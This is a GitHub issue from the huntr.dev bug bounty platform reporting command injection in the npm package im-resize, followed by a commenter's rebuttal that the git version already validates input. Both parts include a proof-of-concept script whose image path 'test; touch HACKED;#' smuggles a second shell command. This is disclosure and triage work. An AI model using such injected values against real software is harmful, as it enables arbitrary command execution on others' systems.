Turistforeningen/node-im-resize

huntr.dev - Command Injection

huntr-helper opened this issue · 1 comment

This issue has been generated on behalf of Mik317 (https://huntr.dev/app/users/Mik317)

Vulnerability Description

The issue occurs because user-controlled input (the image path) is formatted into a shell command string that is then executed without any validation. The issue arises here: https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L115

Steps To Reproduce:

  1. Create the following PoC file:
// poc.js
var resize = require('im-resize');

var image = {
  path: 'test; touch HACKED;#',
  width: 5184,
  height: 2623
};
 
var output = {
  versions: [{
    suffix: '-thumb',
    maxHeight: 150,
    maxWidth: 150,
    aspect: "3:2"
  },{
    suffix: '-square',
    maxWidth: 200,
    aspect: "1:1"
  }]
};
 
resize(image, output, function(error){console.log()});
  2. Check there aren't files called HACKED
  3. Execute the following commands in another terminal:
npm i im-resize # Install affected module
node poc.js # Run the PoC
  4. Recheck the files: now HACKED has been created

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

The NPM version is vulnerable, but I think this bug is a false positive for the git version, since code injection is mitigated in:

https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L10

In commit de624da of Feb 3

Instead of using the npm version, the test should be executed against the git version, after cloning, like:

// poc.js
//var resize = require('im-resize');
var resize = require('./');

var image = {
  path: 'test; touch HACKED;#',
  width: 5184,
  height: 2623
};
 
var output = {
  versions: [{
    suffix: '-thumb',
    maxHeight: 150,
    maxWidth: 150,
    aspect: "3:2"
  },{
    suffix: '-square',
    maxWidth: 200,
    aspect: "1:1"
  }]
};
 
resize(image, output, function(error){console.log()});

Execute by:

npm i aspectratio # Install required module
node poc.js # Run the PoC

Will yield:

Input Validation failed, Suspicious Characters found

stopping execution and avoiding code injection

exec is called in https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L13, so calling https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L115 directly will produce a string and not code execution.

PS. I would suggest granting the bounty, considering the time it took me to test and document this, as well as helping improve huntr bug quality.